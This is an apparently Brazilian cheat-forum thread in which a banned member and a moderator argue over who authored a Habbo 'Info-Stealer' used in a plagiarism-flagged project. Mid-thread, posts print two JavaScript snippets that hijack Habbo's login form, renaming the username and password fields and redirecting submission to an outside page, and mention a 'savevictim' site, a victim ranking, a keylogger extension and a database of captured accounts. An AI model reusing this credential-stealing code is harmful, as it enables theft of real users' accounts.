Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

injustiça.

Loser~~
 Compartilhar

Posts Recomendados

Primeiramente boa tarde a todos , estou aqui para resolver alguns problemas que estou tendo com o moderador -Tasty (Nunca tive problema com moderador nenhum).Ocorreu o seguinte , eu criei um projeto para 'habbo' e postei o mesmo

caso queiram ver o tópico >> http://www.webcheats.com.br/forum/habbo-cheats-hacks/1960458-conteudo-leechado.html , depois de algumas hora olhei o tópico

e vi que tinha sido fechado por lecher(Plagio) , não entendi o fechamento do tópico , pois não tinha nada

plagiado lá . Ele fechou o tópico por causa de uma função que eu estava usando que se chama Info-Stealer

que eu pedi para o criador dela (Phoenix) , e ele me autorizou a usar .

Mais o pior não foi isso , logo em seguida o moderador posta um project lechado (do HBX "Criado pelo Drizer") >> http://www.webcheats.com.br/forum/habbo-cheats-hacks/1960777-web-pro-ject-v1.html

, caso tenha alguma dúvida , que ele lechou esse project pergunte para todos os membros (da área do habbo) que terão respostas.

Peço que esse problema seja resolvido , e quando escolher algum membro para moderador , escolha um que saiba lhe dar com o publico, obrigado.

OBS:Estou em Fake por que a minha conta original foi banida.

By: Kaue Drey

Link para o comentário
Compartilhar em outros sites

Olá, boa noite.

Bem seu projeto foi marcado como conteúdo leechado não apenas por causa

do phoenix até por que o phoenix não criou o info stealer como você pensa você

pegou da extensão dele que nem é dele foi criado pelo membro vews (non-reply)

bem já que você acha que eu sou mentiroso as provas estão abaixo:

Bem simples o fechamento primeiro:

PHjLU.png

Segundo:

É necessário se cadastrar para acessar o conteúdo.
s t ebin.com/DatuVbtr

satisfeito? :D

Eu tenho permissão biafoox melhor que ninguém é uma moderadora antiga da área

sabendo que eu não leechei até por que eu fiz primeiro o projeto e a extensão do que

o phoenix né? não tenho poder de viajar no tempo ;);)

jlNTj1vq6FSb2.pngjjvX5W0fK0o1i.png

Link para o comentário

Olá, boa noite.

Bem seu projeto foi marcado como conteúdo leechado não apenas por causa

do phoenix até por que o phoenix não criou o info stealer como você pensa você

pegou da extensão dele que nem é dele foi criado pelo membro vews (non-reply)

bem já que você acha que eu sou mentiroso as provas estão abaixo:

Bem simples o fechamento primeiro:

PHjLU.png

Segundo:

s t ebin.com/DatuVbtr

satisfeito? :D

Eu tenho permissão biafoox melhor que ninguém é uma moderadora antiga da área

sabendo que eu não leechei até por que eu fiz primeiro o projeto e a extensão do que

o phoenix né? não tenho poder de viajar no tempo ;);)

Filho você é tão mentiroso , que você alterou o conteúdo , é fácil inspecionar elemento xD

Iria ser lecher , quando eu utiliza-se o code do non-reply , que não é o caso , estou utilizando o code da extensão do phoenix (que ele criou & me autorizou a usar)

.

Lecher?

Então se o Non -Reply é criador do info - stealer , porque você utiliza o sso - stealer em seu project já que quem criou foi o drizer ?

Link para o comentário

Não tenho por que mentir até por quê, não tenho nada contra você.

Eu não mudei nada rs eu tirei print e mostrei as provas do mesmo

e não é possível modificar pelo network, é apenas isso amigo.

Quando non-reply e phoenix não tenho nada o que fazer a respeito dos dois.

Espero que tudo tenha se resolvido abraços.

Link para o comentário

Print não prova nada ....O code que estou usando é do phoenix , simples fazer uma print falso & postar aqui falando que estou errado.

Não tem nada resolvido , aqui , enquanto minha conta não estiver desbanida e o tópico aberto irei levar o caso adiante , e a essa frase acima que você nem comentou?

Então se o Non -Reply é criador do info - stealer , porque você utiliza o sso - stealer em seu project já que quem criou foi o drizer ?

Responde ai -Tasty , vem falar que foi também o Non-Reply quem criou o SSO-Stealer ? Se foi o drizer quem criou o SSO você não pode usar o mesmo em seu Project xD , Lech.

Caso achem que estou mentindo de uma olhada , desde a chegada do -Tasty na WC , ai iremos ver quem é o lecher aqui :)

.

Link para o comentário

Bem já provei tudo que é leecher coloquei prints etc...

o meu passado não tem nada a ver com o seu projeto leechado apenas isso.

Encerro minha participação aqui.

Lecher seria seu eu pegasse o code e usar sem autorização , que não foi o meu caso , eu mesmo pedi autorização para o criador do script (phoenix) , seria lech se o código fosse identico ao que você posto acima , mas como não é.....Caso você tenha alguma dúvida pergunte para o phoenix se ele deixou usar :D

Más o que eu fico impressionado é que você fica desviando do assunto

Não respondeu ainda?

O osso , é que você nem moderador deveria ser , primeiro: por ser arrogante , segundo : não tem caráter & terceiro :Lecher

Link para o comentário

Irei explicar novamente, a extensão que você pegou supostamente não foi

criada pelo phoenix, o phoenix pegou por que tem autorização que foi passado

pelo non sendo que eles eram amigos e ambos se autorização, porém phoenix não criou nada

rsrs, apenas adaptou umas coisinhas aqui e alí aí eu fui no seu projeto para verificar

se havia algo igual, e percebi que tinha.

SSo:

Ideia de sso multiplos foi ideia dele tbm que o phoenix pegou se quiser pergunte ao próprio

então é isso.

Meu trix project não tem nada a ver com hbx até por que não se encontra mais no fórum por motivos

de brigas que os membros fazem sobre o mesmo e pretendo nunca mais postar.

Apenas isso, resolvido?

Link para o comentário

Já disse só estará resolvido quando alguém da staff decidir.

Filho , os script são diferentes , o que ta no meu project é totalmente diferente do Non-Reply , (ESTOU USANDO O QUE O PHOENIX CRIOU :D)

E quanto ao SSO o DRIZER foi o criador , provas? Qual foi o primeiro project que lançou? "HBX" e o mesmo era do drizer e freedbull , quais métodos possuia........

Você é tão lecher que usou até o chat dele , sem autorização 'não tem capacidade de criar um';

Se o meu projeto foi fechado , o seu também terá de ser fechado , quando postado , por usar o SSO - Stealer ,sem autorização do criador , Drizer .

Meu trix project não tem nada a ver com hbx até por que não se encontra mais no fórum por motivos

de brigas que os membros fazem sobre o mesmo e pretendo nunca mais postar.

Ok faça isso , irei ser grato para o resto da vida.Assim ira dar exemplo para os membros de não postar conteúdos lechados.

Link para o comentário

Se você apresentar provas plausível que seu projeto não é leechado e que tem

autorização de ambos os criadores, vou abrir com todo prazer e tirar a infração.

Só estou esperando o phoenix entrar , para postar um print enorme aqui , para você ver :D

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

http://www.webcheats.com.br/forum/opinioes-e-reclamacoes/1962942-membro-loser-criando-reclamacao-falsa.html

Vews , em momento algum no tópico disse que você me deu autorização... Peguei da extensão do phoenix então que tem q dar autorização é ele e não você , os códigos são totalmente diferentes '-'

Kaue Drey é um membro novato no fórum então resolveu pegar

do trix o mesmo até por que o phoenix não postou nenhuma

extensão de info stealer como ele diz a unica que foi postada

foi a que eu e ele adaptamos uma vez o sistema de ir para um site

da xuxa que o criador mesmo é o non-reply é bem antigo esse método

ele pensa que foi criado pelo phoenix, bem eu apresentei provas

que o mesmo era leechado la, obrigado pela denúncia non-reply.

Ajudará bastante

Já ta apelando -Tasty ? não consegue se defender e fia incluindo as pessoas na história :D

-------------------------------------------------------------

Tópico Da extensão do PHOENIX da onde eu mesmo retirei o código e pedi para usar

>> http://www.webcheats.com.br/forum/habbo-cheats-hacks/1715892-hacking-super-extensao-keylogger-protecao-extra.html

Link para o comentário

Boa tarde.

Em casos de projetos de leecher, tem este tipo de confusão. Os 2 membros que estão ''enrolados'' nessa reclamação são o Phoenix e N0n-Reply, mas até agora não foi confirmado que nenhum dos dois tinham dado autorização para ser usada a extensão no projeto, além de não estar confirmado quem foi o autor oficial da Info-Stealer.

Lembrando que o assunto principal aqui e a sua reclamação, e não sua opinião sobre o moderador Tasty.

Mas acaba de ser criado um tópico, onde o mesmo diz que você não foi autorizado a usar:

O mesmo diz que a extensão é de sua autoria, e você diz que foi o Phoenix que a criou. Caso não poste mais provas plausíveis para o seu projeto ser reaberto, continuará fechado. Posso não ter experiencia no assunto, mas basta analisar provas.

Abraços.

Fg5uofw.pngx8iyddZ.png

© 2011 - 2018

Link para o comentário

Boa tarde.

Em casos de projetos de leecher, tem este tipo de confusão. Os 2 membros que estão ''enrolados'' nessa reclamação são o Phoenix e N0n-Reply, mas até agora não foi confirmado que nenhum dos dois tinham dado autorização para ser usada a extensão no projeto, além de não estar confirmado quem foi o autor oficial da Info-Stealer.

Lembrando que o assunto principal aqui e a sua reclamação, e não sua opinião sobre o moderador Tasty.

Mas acaba de ser criado um tópico, onde o mesmo diz que você não foi autorizado a usar:

O mesmo diz que a extensão é de sua autoria, e você diz que foi o Phoenix que a criou. Caso não poste mais provas plausíveis para o seu projeto ser reaberto, continuará fechado. Posso não ter experiencia no assunto, mas basta analisar provas.

Abraços.

Basta ? > http://www.webcheats.com.br/forum/habbo-cheats-hacks/1715892-hacking-super-extensao-keylogger-protecao-extra.html

Agora abre os arquivos e compare o script do phoenix com o do Non-Reply hehe

Criado por Non-Reply:

if (document.habboLoggedIn==true){

new Ajax.Request("/account/logout_ok?token="+$$('meta[name=csrf-token]')[0].content,{onComplete:function(){alert('Execute o c�digo deslogado');location='/';}});

} else {

document.getElementById('loginformitem').action='

document.getElementById('loginformitem').method = 'post';

document.getElementById('login-username').name = 'u';

document.getElementById('login-password').name = 'p';

}

Criado por Phoenix :

if (document.habboLoggedIn == false) {

c = $$(".login-field"), c[0].name = "u", c[1].name = "p", f = $$("#loginformitem")[0], f.action = "

f.method = "GET";

};

})();

Link para o comentário

Meu caro amigo você mudou como eu mostrei no print eu como fui esperto

tirei print para mostrar que você mudou, e agora está usando o do phoenix

pra que continuar mentindo? :D

@code

mesmo assim continua sendo o mesmo código com as mesma funções

eu acho que você que é "intermediário em javascript" deveria saber disso

melhor que ninguém né? que é a mesma coisa.

Link para o comentário

Meu caro amigo você mudou como eu mostrei no print eu como fui esperto

tirei print para mostrar que você mudou, e agora está usando o do phoenix

pra que continuar mentindo? :D

@code

mesmo assim continua sendo o mesmo código com as mesma funções

eu acho que você que é "intermediário em javascript" deveria saber disso

melhor que ninguém né? que é a mesma coisa.

KK troquei ? Cara você deveria ter ensinado o bart ver o conteúdo , aquela hora em que nós estava no msn...

flw então expert em javascript , Drizer 2 (Sabe nem arrumar um login simples)

O code tem a mesma função porém , são diferente (e também de diferentes criadores) ,

Link para o comentário

Cara primeiramente este código aí nem funciona você trocou e nem sabe trocar

direito tanto que leva para savevictim.com kkkkkkkkkkk pelo amor de deus

amigo, isso é feio sabia? ficar mentindo eu encerro minha participação aqui

deu o que tinha de da já provei de todas as maneiras que é leecher ele nada

de provas que não é.

oQOmB.png

Amigo pelo amor quando for mentir faça as coisas direito uma dica pra você.

Este código não funciona mais e você mudou veja na print.

Link para o comentário

Cara primeiramente este código aí nem funciona você trocou e nem sabe trocar

direito tanto que leva para savevictim.com kkkkkkkkkkk pelo amor de deus

amigo, isso é feio sabia? ficar mentindo eu encerro minha participação aqui

deu o que tinha de da já provei de todas as maneiras que é leecher ele nada

de provas que não é.

oQOmB.png

Amigo pelo amor quando for mentir faça as coisas direito uma dica pra você.

Este código não funciona mais e você mudou veja na print.

lol , savevictim tinha excluido ontem e.e

save >> do js exclui ontem também e.e

Não funciona? Se quiser que hopedo , coloco de novo , especialmente para você testar....Só falta você querer ver a DB do projeto hehe

Prova de que o usuário TESTE ^^ Não existe na minha DB

Todos usuários cadastrados :

241nwbn.png

OBS: Se quiserem acreditem , se não ....Já disse se acham que eu sou lecher pergunte para os membros da área que irão ver quem é hehe

Se quiser já pode fechar o tópico , vou esperar o phoenix entrar e postar o print , com a autorização .Aproveitem irei tirar o projeto do ar as 18:00 hrs , estarei criando outro com as mesma funções :)

Link para o comentário

Meu deus é óbvio que não existe se não vai pra la como vai existir?

se não tem o salve.php e essa tabela aí ainda é o de cadastro

eu creio que todos os moderadores da minha área entendem disso

é impossível você tentar mentir.

E sim pode postar um projeto novo, porém que não seja leechado.

Link para o comentário

Velho iremos ver quem está mentindo basta esperar .....

E sim pode postar um projeto novo, porém que não seja leechado.

Rs você deveria seguir isso hehe , tentou criar um projeto não lechado "HAX PROJECT" , achei uma falha no chat e vc nem para arrumar? Até tirou do ar rs

Ai para ganhar THX , posta o trix project totalmente lechado , rank de vitimas , Shout-Box , traduzindo o projeto inteiro :)

E Por favor não dirija mais a palavra comigo.

Link para o comentário

Se quiser criar outro projeto crie, desde que não tenha nada leechado. Pedirei para um superior fechar o tópico, pois sei que daqui não sairá nada útil. E sim mais discussões entre você e o moderador Tasty. Não sei o porque desses projetinhos na área Habbo, pois uns utilizam coisas dos outros, e depois dizem que o outro não sabe criar.

Não haveria tais confusões se uns parassem de ficar dependendo de outros.

Abraços.

Fg5uofw.pngx8iyddZ.png

© 2011 - 2018

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.